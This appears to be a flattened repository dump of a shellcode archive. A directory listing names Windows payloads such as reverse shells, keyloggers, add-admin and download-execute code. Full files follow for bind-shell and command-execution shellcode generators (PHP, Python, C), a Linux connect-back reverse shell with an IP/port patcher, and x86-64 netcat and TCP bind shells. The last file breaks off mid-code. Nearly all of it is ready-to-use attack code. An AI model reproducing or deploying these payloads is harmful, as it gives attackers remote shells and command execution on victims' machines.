├── Windows_x86_-_MessageBoxA_Shellcode__242_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_MessageBox_Shellcode__Metasploit___Shellcode_exploit_for_Win_x86_platform__Tags:_Metasploit_Framework │ └── shellcode.c ├── Windows_x86_-_PEB!NtGlobalFlags_Shellcode__14_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_PEB__Kernel32_dll__ImageBase_Finder_Alphanumeric_Shellcode__67_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_PEB__Kernel32_dll__ImageBase_Finder__ASCII_Printable__Shellcode__49_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Reverse_TCP_Shell__192_168_232_129:4444_TCP__+_Persistent_Access_Shellcode__494_Bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Reverse_TCP_Staged_Alphanumeric_Shell__127_0_0_1:4444_TCP__Shellcode__332_Bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Reverse_UDP_Keylogger__www_example_com:4444_UDP__Shellcode__493_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_SE_DACL_PROTECTED_Protect_Process_Shellcode__229_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_ShellExecuteA_NULL,NULL,_cmd_exe_,NULL,NULL,1__Shellcode__250_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_URLDownloadToFileA____http:__192_168_86_130_sample_exe__+_SetFileAttributesA____pyld_exe__+_WinExec___+_ExitProcess___Shellcode__394_bytes___Sh__ │ └── shellcode.c ├── Windows_x86_-_WinExec__cmd_exe_,0__Shellcode__184_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Write-to-file___pwned____f_txt__Null-Free_Shellcode__278_bytes___CVE-2010-0425__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_system__systeminfo___Shellcode__224_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c └── Windows_x86_-_user32!MessageBox__Hello_World!__Null-Free_Shellcode__199_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows ├── Safari_4_0_5___5_0_0__Windows_XP_7__-_JavaScript_JITed_exec_calc__ASLR_DEP_Bypass__Null-Free_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Add_Administrator_User__BroK3n_BroK3n__Null-Free_Shellcode__194_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Add_Local_Administrator_User__RubberDuck_mudbath__+_ExitProcess_WinExec_Shellcode__279_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Egghunter_JITed_Stage-0_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Keylogger_to_File__%TEMP%_log_bin__Null-Free_Shellcode__601_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Keylogger_to_File____log_bin__Null-Free_Shellcode__431_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_MessageBoxA_Shellcode__238_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_MessageBox_Null-Free_Shellcode__113_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_URLDownloadToFile__http:__bflow_security-portal_cz_down_xy_txt__+_WinExec_+_ExitProcess_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_cmd_exe_+_ExitProcess_WinExec_Shellcode__195_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_Mobile_6_5_TR_-_Phone_Call_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_Mobile_6_5_TR__WinCE_5_2__-_MessageBox_Shellcode__ARM___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Professional_SP2__English__-_MessageBox_Null-Free_Shellcode__16_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Professional_SP2__English__-_Wordpad_Null-Free_Shellcode__12_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Professional_SP3_-_calc_exe__C:_WINDOWS_system32_calc_exe__ROP_Shellcode__428_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_SP2_-_PEB_ISbeingdebugged_Beep_Shellcode__56_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_SP3__English__-_MessageBoxA_Shellcode__87_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Vista_7_-_Egghunter_JITed_Stage-0_Adjusted_Universal_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP___10_-_Download_File_+_Execute_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c └── Windows_x86_x64_-_cmd_exe_Shellcode__718_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── getItem.py └── getItem.pyc /Generator/Linux_-_write___+_exit_0__Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Linux write() & exit(0) shellcode genearator with customizable text 3 | # Usage: ./generator 4 | # Author: Stoke 5 | # Tested on: Ubuntu 8.10 6 | # E-mail: stoke95[at]yahoo[dot]it 7 | # Web: hack2web.altervista.org 8 | # Visit: blasterhacking.forumcommunity.net 9 | 10 | import re, sys 11 | 12 | def str2hex(string): 13 | msg = '' 14 | for n in string: 15 | msg += r"\x"+hex(ord(n))[2:] 16 | return msg 17 | 18 | 19 | if len(sys.argv) != 2: 20 | print "Usage: ./shellgen " 21 | sys.exit(0) 22 | 23 | shell = r"\xeb\x11\x31\xc0\xb0\x04\xb3\x01\x59\xb2" 24 | shell1 = r"\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xea\xff\xff\xff" 25 | 26 | strlen = hex(len(sys.argv[1])) 27 | hstrlen = strlen.replace("0x",r"\x") 28 | if len(hstrlen[2:]) < 2: 29 | hstrlen = r"\x0"+hstrlen[2] 30 | msg = str2hex(sys.argv[1]) 31 | print shell+hstrlen+shell1+msg -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | http://www.shell-storm.org/shellcode/ 8 | */ 9 | 10 | function syntax() 11 | { 12 | echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; 13 | } 14 | 15 | function linux86bind($port) 16 | { 17 | if($port > 65535 || $port < 4100){ 18 | echo "Erreur Port\nSelect a port between 4100 and 65535\n"; 19 | return false; 20 | } 21 | 22 | $inser .= "\nchar shellcode[] = \n"; 23 | $inser .= " /* BindPort TCP/$port; Linux/x86; Gen:http://www.shell-storm.org */\n"; 24 | $inser .= "\n"; 25 | $inser .= " \x22\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\x22\n"; 26 | $inser .= " \x22\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x"; 27 | 28 | $res_port = base_convert($port, 10, 16); 29 | 30 | $length = strlen($res_port)-1; 31 | $i = 1; 32 | 33 | for($idx = 0; $idx < $length+1; $idx++) 34 | { 35 | $i++; 36 | if($i == 4) 37 | $inser .= "\\x"; 38 | 39 | $inser .= $res_port[$idx]; 40 | } 41 | 42 | $inser .= "\\x43\\x66\\x53\x22\n"; 43 | $inser .= " \x22\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\x22\n"; 44 | $inser .= " \x22\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\x22\n"; 45 | $inser .= " \x22\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\x22\n"; 46 | $inser .= " \x22\\xe1\\xb0\\x0b\\xcd\\x80\x22\x3b\n"; 47 | $inser .= "\n"; 48 | $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; 49 | $inser .= " (*(void(*)()) shellcode)();\n"; 50 | $inser .= "\n"; 51 | $inser .= "\n"; 52 | 53 | return $inser; 54 | } 55 | 56 | if($argc < 2){ 57 | syntax(); 58 | return false; 59 | } 60 | $port = $argv[1]; 61 | echo linux86bind($port); 62 | 63 | ?> 64 | 65 | # milw0rm.com [2009-06-09] -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Command_Generator_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * BlackLight's shellcode generator for Linux x86 4 | * Tested anywhere, working & NULL-free 5 | * 6 | * Usage: ./generator 7 | * ...and then you've got a ready2inject NULL-free shellcode for the command you like 8 | * 9 | * copyleft 2008 by BlackLight 10 | * < http://blacklight.gotdns.org > 11 | * 12 | * Released under GPL v.3 licence 13 | * 14 | * Greetz to: evilsocket, for the idea he gave me ;) 15 | * Greetz to: my friends, who tested, used and appreciated this code and helped 16 | * me to improve it to what it is now 17 | * Greetz to: my girl, next to me in any moment even if she had no idea 18 | * about what I was doing ^^ 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | char code[] = 26 | "\\x60" /*pusha*/ 27 | "\\x31\\xc0" /*xor %eax,%eax*/ 28 | "\\x31\\xd2" /*xor %edx,%edx*/ 29 | "\\xb0\\x0b" /*mov $0xb,%al*/ 30 | "\\x52" /*push %edx*/ 31 | "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ 32 | "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ 33 | "\\x89\\xe3" /*mov %esp,%ebx*/ 34 | "\\x52" /*push %edx*/ 35 | "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ 36 | "\\x89\\xe1" /*mov %esp,%ecx*/ 37 | "\\x52" /*push %edx*/ 38 | "\\xeb\\x07" /*jmp 804839a */ 39 | "\\x51" /*push %ecx*/ 40 | "\\x53" /*push %ebx*/ 41 | "\\x89\\xe1" /*mov %esp,%ecx*/ 42 | "\\xcd\\x80" /*int $0x80*/ 43 | "\\x61" /*popa*/ 44 | "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; 45 | 46 | int main (int argc, char **argv) { 47 | int i,len=0; 48 | char *shell,*cmd; 49 | 50 | if (!argv[1]) 51 | exit(1); 52 | 53 | for (i=1; i: 12 | 8048060: eb 12 jmp 0x8048074 13 | 8048062: 5b pop %ebx 14 | 8048063: 31 c0 xor %eax,%eax 15 | 8048065: 88 43 05 mov %al,0x5(%ebx) 16 | 8048068: b0 08 mov $0x8,%al 17 | 804806a: b1 ff mov $0xff,%cl 18 | 804806c: b5 ff mov $0xff,%ch 19 | 804806e: cd 80 int $0x80 20 | 8048070: b0 01 mov $0x1,%al 21 | 8048072: cd 80 int $0x80 22 | 8048074: e8 e9 ff ff ff call 0x8048062 23 | 8048079: 61 popa 24 | 804807a: 6a 69 push $0x69 25 | 804807c: 74 68 je 0x80480e6 26 | 804807e: 23 .byte 0x23 27 | --------------------------------------------------------------------------------- 28 | b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com 29 | 30 | Om Asato Maa Sad-Gamaya | 31 | Tamaso Maa Jyotir-Gamaya | 32 | Mrtyor-Maa Amrtam Gamaya | 33 | Om Shaantih Shaantih Shaantih | 34 | """ 35 | 36 | bann3r = ''' 37 | /* 38 | [][][][][][][][][][][][][][][][][][][][][][][] 39 | [] [] 40 | [] c0d3d by Ajith Kp [ajithkp560] [] 41 | [] http://www.terminalcoders.blogspot.in [] 42 | [] [] 43 | [][][][][][][][][][][][][][][][][][][][][][][] 44 | */ 45 | ''' 46 | sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43" 47 | sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff" 48 | print bann3r 49 | if len(argv)<1: 50 | print 'Usage: '+argv[0]+' name_of_file' 51 | else: 52 | fil3 = argv[1] 53 | h3x = '' 54 | for i in range(len(fil3)): 55 | h3x+=str('\\'+hex(ord(fil3[i]))[1:]) 56 | h3x+=str('\\' + 'x23') 57 | l3n = '\\x'+hex((len(fil3)))[2:].zfill(2) 58 | sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x) 59 | print '// Compile with' 60 | print '// $ gcc -o output source.c' 61 | print '// $ execstack -s output' 62 | print '// $ ./output' 63 | print '////////////////////////////////////////////\n' 64 | print '# include ' 65 | print 'char sh[] = "'+sh+'";' 66 | print 'main(int argc, char **argv)' 67 | print '''{ 68 | int (*func)(); 69 | func = (int (*)()) sh; 70 | (int)(*func)();''' 71 | print '}' 72 | print '\n////////////////////////////////////////////' -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Reverse_TCP_Shell_Shellcode__90_bytes___Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*---------------------------------------------------------------------------* 2 | * 90 byte Connect Back shellcode * 3 | * by Russell Sanford - xort@tty64.org * 4 | *---------------------------------------------------------------------------* 5 | * filename: x86-linux-connect-back.c * 6 | * info: Compiled with DTP Project. * 7 | * discription: This is a x86-linux connect back shellcode. Just invoke * 8 | * the function patchcode() before using shellcode. The format * 9 | * for invoking patchcode is as follows: * 10 | * * 11 | * patchcode(shellcode,"11.22.33.44",31337); * 12 | *---------------------------------------------------------------------------*/ 13 | 14 | char shellcode[] = 15 | "\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" 16 | " xor\x81\x04\x24t@tt\x68y64.\x81\x04\x24org \x6a\x10\x51\x50\x89\xe1\xb0\x66" 17 | "\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50" 18 | "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b" 19 | "\xcd\x80\xeb\xfe"; 20 | 21 | int find_safe_offset(int INT_A) { 22 | 23 | int INT_B=0; 24 | 25 | do { 26 | INT_A -= 0x01010101; INT_B += 0x01010101; 27 | } 28 | while ( ((INT_A & 0x000000ff) == 0) || 29 | ((INT_A & 0x0000ff00) == 0) || 30 | ((INT_A & 0x00ff0000) == 0) || 31 | ((INT_A & 0xff000000) == 0) ); 32 | 33 | return INT_B; 34 | } 35 | 36 | void patchcode(char *shellcode, char *IP, int PORT) { 37 | 38 | int IP_A = inet_addr(IP); 39 | int IP_B = find_safe_offset(IP_A); 40 | 41 | int PORT_A = ((ntohs(PORT) << 16) + 2); 42 | int PORT_B = find_safe_offset(PORT_A); 43 | 44 | *(int *)&shellcode[19] = (IP_A - IP_B); 45 | *(int *)&shellcode[26] = IP_B; 46 | 47 | *(int *)&shellcode[31] = (PORT_A - PORT_B); 48 | *(int *)&shellcode[38] = PORT_B; 49 | } 50 | 51 | // milw0rm.com [2005-12-28] -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Typewriter_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Typewriter Shellcode Generator 4 | # Paw Petersen, SLAE-656 5 | # https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/ 6 | 7 | import sys,struct 8 | 9 | string = sys.argv[1] 10 | 11 | length = struct.pack("= len(string): 17 | if len(chunk) < 4: 18 | asm_string_chunk = ("\x68"+struct.pack("<4s",chunk+"\x0a"*(4-len(chunk))))+asm_string_chunk 19 | else: 20 | asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk 21 | asm_string_chunk = ("\x68"+struct.pack("<4s","\x0a"*4))+asm_string_chunk 22 | else: 23 | asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk 24 | 25 | sc = asm_string_chunk+"\x31\xc9\xb1"+length+"\x51\xb8\x11\x11\x51\x08\x50\x31\xc0\x50\x54\x51\x89\xe6\x83\xc6\x14\x03\x74\x24\x10\x2b\x34\x24\x56\x89\xf1\xeb\x1c\xeb\x0c\x59\x59\xe2\xe8\x31\xdb\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\xa2\x8d\x5c\x24\x0c\x31\xc9\xcd\x80\xeb\xe6\x31\xd2\xb2\x01\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xeb\xd4" 26 | 27 | print '"' + ''.join('\\x%02x' % ord(c) for c in sc) + '";' -------------------------------------------------------------------------------- /Generator/Solaris_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | http://www.shell-storm.org/shellcode/ 8 | */ 9 | 10 | function syntax() 11 | { 12 | echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; 13 | } 14 | 15 | function win32bind($port) 16 | { 17 | if($port > 65535 || $port < 4100){ 18 | echo "Erreur Port\nSelect a port between 4100 and 65535\n"; 19 | return false; 20 | } 21 | 22 | $inser .= "\nchar shellcode[] = \n"; 23 | $inser .= " /* BindPort TCP/$port; Os:Solaris; Gen:http://payload.shell-storm.org */\n"; 24 | $inser .= "\n"; 25 | 26 | $inser .= " \x22\\xb8\\xff\\xf8\\xff\\x3c\\xf7\\xd0\\x50\\x31\\xc0\\xb0\\x9a\\x50\\x89\\xe5\\x31\\xc9\x22\n"; 27 | $inser .= " \x22\\x51\\x41\\x41\\x51\\x51\\xb0\\xe6\\xff\\xd5\\x31\\xd2\\x89\\xc7\\x52\\x66\\x68\x22\n"; 28 | $inser .= " \x22\\x"; 29 | 30 | $res_port = base_convert($port, 10, 16); 31 | 32 | $length = strlen($res_port)-1; 33 | $i = 1; 34 | 35 | for($idx = 0; $idx < $length+1; $idx++) 36 | { 37 | $i++; 38 | if($i == 4) 39 | $inser .= "\\x"; 40 | 41 | $inser .= $res_port[$idx]; 42 | } 43 | $inser .= "\x22 /* Port ".$port." */\n"; 44 | $inser .= " \x22\\x66\\x51\\x89\\xe6\\x6a\\x10\\x56\\x57\\xb0\\xe8\\xff\\xd5\\xb0\\xe9\\xff\\xd5\x22\n"; 45 | $inser .= " \x22\\x50\\x50\\x57\\xb0\\xea\\xff\\xd5\\x31\\xd2\\xb2\\x09\\x51\\x52\\x50\\xb0\\x3e\x22\n"; 46 | $inser .= " \x22\\xff\\xd5\\x49\\x79\\xf2\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\x22\n"; 47 | $inser .= " \x22\\x89\\xe3\\x50\\x53\\x89\\xe2\\x50\\x52\\x53\\xb0\\x3b\\xff\\xd5\x22\x3b\n"; 48 | $inser .= "\n"; 49 | $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; 50 | $inser .= " (*(void(*)()) shellcode)();
"; 51 | $inser .= "\n"; 52 | $inser .= "\n"; 53 | 54 | return $inser; 55 | } 56 | 57 | if($argc < 2){ 58 | syntax(); 59 | return false; 60 | } 61 | $port = $argv[1]; 62 | echo win32bind($port); 63 | 64 | ?> 65 | 66 | # milw0rm.com [2009-06-16] -------------------------------------------------------------------------------- /Generator/Windows_XP_SP1_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | http://www.shell-storm.org/shellcode/ 8 | */ 9 | 10 | function syntax() 11 | { 12 | echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; 13 | } 14 | 15 | function win32bind($port) 16 | { 17 | if($port > 65535 || $port < 4100){ 18 | echo "Erreur Port\nSelect a port between 4100 and 65535\n"; 19 | return false; 20 | } 21 | 22 | $inser .= "\nchar shellcode[] = \n"; 23 | $inser .= " /* BindPort TCP/$port; Os:XP/SP1; Gen:http://www.shell-storm.org */\n"; 24 | $inser .= "\n"; 25 | 26 | $inser .= " \x22\\x83\\xC4\\xEC\\x33\\xC0\\x50\\x50\\x50\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xB8\x22\n"; 27 | $inser .= " \x22\\x01\\x5A\\xAB\\x71\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x89\\x45\\xF4\\xB0\\x02\x22\n"; 28 | $inser .= " \x22\\x66\\x89\\x45\\xF0\\x66\\xC7\\x45\\xF2"; 29 | $inser .= "\\x"; 30 | 31 | $res_port = base_convert($port, 10, 16); 32 | 33 | $length = strlen($res_port)-1; 34 | $i = 1; 35 | 36 | for($idx = 0; $idx < $length+1; $idx++) 37 | { 38 | $i++; 39 | if($i == 4) 40 | $inser .= "\\x"; 41 | 42 | $inser .= $res_port[$idx]; 43 | } 44 | $inser .= "\\x6A\\x10\\x8D\\x55\\xF0\x22\n"; 45 | $inser .= " \x22\\x52\\x53\\xB8\\xCE\\x3E\\xAB\\x71\\xFF\\xD0\\x6A\\x01\\x53\\xB8\\xE2\\x5D\x22\n"; 46 | $inser .= " \x22\\xAB\\x71\\xFF\\xD0\\x33\\xC0\\x50\\x50\\x53\\xB8\\x8D\\x86\\xAB\\x71\\xFF\x22\n"; 47 | $inser .= " \x22\\xD0\\x8B\\xD8\\xBA\\x1D\\x20\\xE8\\x77\\x53\\x6A\\xF6\\xFF\\xD2\\x53\\x6A\x22\n"; 48 | $inser .= " \x22\\xF5\\xFF\\xD2\\x53\\x6A\\xF4\\xFF\\xD2\\xC7\\x45\\xFB\\x41\\x63\\x6D\\x64\x22\n"; 49 | $inser .= " \x22\\x8D\\x45\\xFC\\x50\\xB8\\x44\\x80\\xC2\\x77\\xFF\\xD0\x22\x3b\n\n"; 50 | $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; 51 | $inser .= " (*(void(*)()) shellcode)();\n\n"; 52 | 53 | return $inser; 54 | } 55 | 56 | if($argc < 2){ 57 | syntax(); 58 | return false; 59 | } 60 | $port = $argv[1]; 61 | echo win32bind($port); 62 | 63 | ?> 64 | 65 | # milw0rm.com [2009-06-09] -------------------------------------------------------------------------------- /Generator/Windows_XP___10_-_Command_Generator_WinExec_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #All Windows Null-Free WinExec Shellcode 2 | 3 | """ 4 | #Coded by B3mB4m 5 | #Concat : b3mb4m@tuta.io 6 | #Home : b3mb4m.blogspot.com 7 | #10.12.2015 8 | Tested on : 9 | Windows XP/SP3 x86 10 | Windows 7 Ultimate x64 11 | Windows 8.1 Pro Build 9600 x64 12 | Windows 10 Home x64 13 | -This shellcode NOT using GetProcAddress function- 14 | -With this python script you can create ur own shellcode- 15 | -This script belongs to shellsploit project- 16 | -https://github.com/b3mb4m/Shellsploit- 17 | """ 18 | 19 | 20 | 21 | def WinExec( command, fill=None): 22 | from re import findall 23 | fill = "31c9b957696e45eb0431c9eb0031c" 24 | fill += "031db31d231ff31f6648b7b308b7f0" 25 | fill += "c8b7f1c8b47088b77208b3f807e0c3" 26 | fill += "375f289c703783c8b577801c28b7a2" 27 | fill += "001c789dd81f957696e45753b8b34a" 28 | fill += "f01c645390e75f68b7a2401c7668b2" 29 | fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd" 30 | if len(command) == 4: 31 | stack = "%s" % (command.encode('hex')) 32 | data = findall("..?", stack) 33 | fill += "68"+"".join(data) 34 | else: 35 | if len(command)%4 == 3: 36 | padd = "\x20" 37 | elif len(command)%4 == 2: 38 | padd = "\x20"*2 39 | elif len(command)%4 == 1: 40 | padd = "\x20"*3 41 | else: 42 | padd = "" 43 | command = command + padd 44 | fixmesempai = findall('....?', command) 45 | for x in fixmesempai[::-1]: 46 | first = str(x[::-1].encode("hex")) 47 | second = findall("..?", first)[::-1] 48 | fill += "68"+"".join(second) 49 | fill += "89e2415152ffd7e886ffffff8b34af0" 50 | fill += "1c645813e4578697475f2817e045072" 51 | fill += "6f6375e98b7a2401c7668b2c6f8b7a1c" 52 | fill += "01c78b7caffc01c731c951ffd7" 53 | 54 | from random import randint 55 | name = str(randint(99999,99999999))+".txt" 56 | with open(name, "w") as exploit: 57 | exploit.write("\\x"+"\\x".join(findall("..?", fill))) 58 | exploit.close() 59 | 60 | print "\n\nLength : %s" % len(findall("..?", fill)) 61 | print "File : %s\n" % name 62 | print "\n\\x"+"\\x".join(findall("..?", fill)) 63 | 64 | 65 | if __name__ == '__main__': 66 | from sys import argv 67 | if len(argv) < 2: 68 | print "\nUsage : python exploit.py 'command'\n" 69 | else: 70 | WinExec(argv[1]) 71 | 72 | 73 | 74 | """ 75 | #include 76 | #include 77 | #include 78 | #include 79 | 80 | //gcc shell.c -o shell.exe 81 | 82 | int main(void){ 83 | char *shellcode = "SHELLCODE"; 84 | DWORD mypage; 85 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), 86 | PAGE_EXECUTE_READWRITE, &mypage); 87 | 88 | if (!ret) { 89 | printf ("VirtualProtect Failed ..\n"); 90 | return EXIT_FAILURE;} 91 | printf("strlen(shellcode)=%d\n", strlen(shellcode)); 92 | ((void (*)(void))shellcode)(); 93 | } 94 | """ -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Bind_Netcat_Shell_Null-Free_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // Exploit Title: [NetCat Bind Shell 64bit 64byte] 5 | // Date: [6/28/2016] 6 | // Exploit Author: [CripSlick] 7 | // Tested on: [Kali 2.0] 8 | // Version: [v1.10-41] 9 | 10 | // ShepherdDowling@gmail.com 11 | // OffSec ID: OS-20614 12 | 13 | // Victim: netstat -an | grep LISTEN | grep tcp 14 | // Attacker: nc 15 | 16 | unsigned char code[] = \ 17 | 18 | #define PORT "\x39\x39" 19 | // Keep to two bytes 20 | 21 | "\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05" 22 | ; 23 | 24 | int main () 25 | { 26 | // I make sure there are no nulls 27 | // The string count will terminate at the first \x00 28 | printf("The Shellcode is %d Bytes Long\n", strlen(code)); 29 | 30 | // Next I throw 0xAAAAAAAA into every register before shellcode execution 31 | // This ensures that the shellcode will run in any circumstance 32 | 33 | __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" 34 | "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 35 | "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 36 | "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 37 | "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" 38 | "call code"); 39 | return 0; 40 | } -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Bind_TCP_Shell__4444_TCP__Shellcode__132_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | linux/x86-64 bindshell(port 4444) 3 | xi4oyu [at] 80sec.com 4 | http://www.80sec.com 5 | 6 | 7 | BITS 64 8 | xor eax,eax 9 | xor ebx,ebx 10 | xor edx,edx 11 | ;socket 12 | mov al,0x1 13 | mov esi,eax 14 | inc al 15 | mov edi,eax 16 | mov dl,0x6 17 | mov al,0x29 18 | syscall 19 | xchg ebx,eax ;store the server sock 20 | ;bind 21 | xor rax,rax 22 | push rax 23 | push 0x5c110102 24 | mov [rsp+1],al 25 | mov rsi,rsp 26 | mov dl,0x10 27 | mov edi,ebx 28 | mov al,0x31 29 | syscall 30 | ;listen 31 | mov al,0x5 32 | mov esi,eax 33 | mov edi,ebx 34 | mov al,0x32 35 | syscall 36 | ;accept 37 | xor edx,edx 38 | xor esi,esi 39 | mov edi,ebx 40 | mov al,0x2b 41 | syscall 42 | mov edi,eax ; store sock 43 | ;dup2 44 | xor rax,rax 45 | mov esi,eax 46 | mov al,0x21 47 | syscall 48 | inc al 49 | mov esi,eax 50 | mov al,0x21 51 | syscall 52 | inc al 53 | mov esi,eax 54 | mov al,0x21 55 | syscall 56 | ;exec 57 | xor rdx,rdx 58 | mov rbx,0x68732f6e69622fff 59 | shr rbx,0x8 60 | push rbx 61 | mov rdi,rsp 62 | xor rax,rax 63 | push rax 64 | push rdi 65 | mov rsi,rsp 66 | mov al,0x3b 67 | syscall 68 | push rax 69 | pop rdi 70 | mov al,0x3c 71 | syscall 72 | */ 73 | 74 | main() { 75 | char shellcode[] = 76 | 